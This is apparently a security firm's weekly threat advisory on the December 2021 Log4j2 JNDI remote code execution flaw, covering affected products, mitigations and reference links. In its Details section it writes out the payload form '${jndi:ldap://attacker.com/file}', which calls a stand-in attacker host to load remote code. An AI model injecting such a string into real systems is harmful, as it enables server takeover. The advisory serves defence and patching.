Back to Weekly Threat

Apache Log4J2 Vulnerability


December 13, 2021

By John Rote

Apache Log4J2 Vulnerability:

A new critical remote code execution vulnerability in Apache Log4j2, a Java-based logging tool, 
was disclosed on 10 December 2021.  According to several publications, the vulnerability is easy to exploit and can lead to full control of the targeted server.  There is no known proof-of-concept exploit available at this time, but this vulnerability is easy to exploit, and a public exploit is expected soon.

Details:

The vulnerability in question is trivially easy to exploit and consists of a malformed Java Naming and Directory Interface (JNDI) request of the form ‘${jndi:ldap://attacker.com/file}.`. It’s difficult to assess the extent of possible impact as Log4j2 is used across a variety of products and services, from Apache products like Struts, Solr, and Flink to security products like ElasticSearch, Logstash, and Kafka, Network products like NetApp and Cisco, and even Minecraft servers.

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false."

Additional Information:

Microsoft released a blog for "Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation." 

hxxps://www.microsoft[.]com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/)

Notable information from the report:

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: 

hxxps://github[.]com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml

Recommendations:

Due to the severity and ease of exploitation of this vulnerability and the expected massive campaign targeting this vulnerability it is highly recommended that all instances of Apache get updated to the latest version (log4j 2.15.0) as soon as possible.  If upgrading is not possible, in previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or by removing the JndiLookup class from the class path.

Useful Links:

https://logging.apache.org/log4j/2.x/security.html
https://issues.apache.org/jira/browse/LOG4J2-3201
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/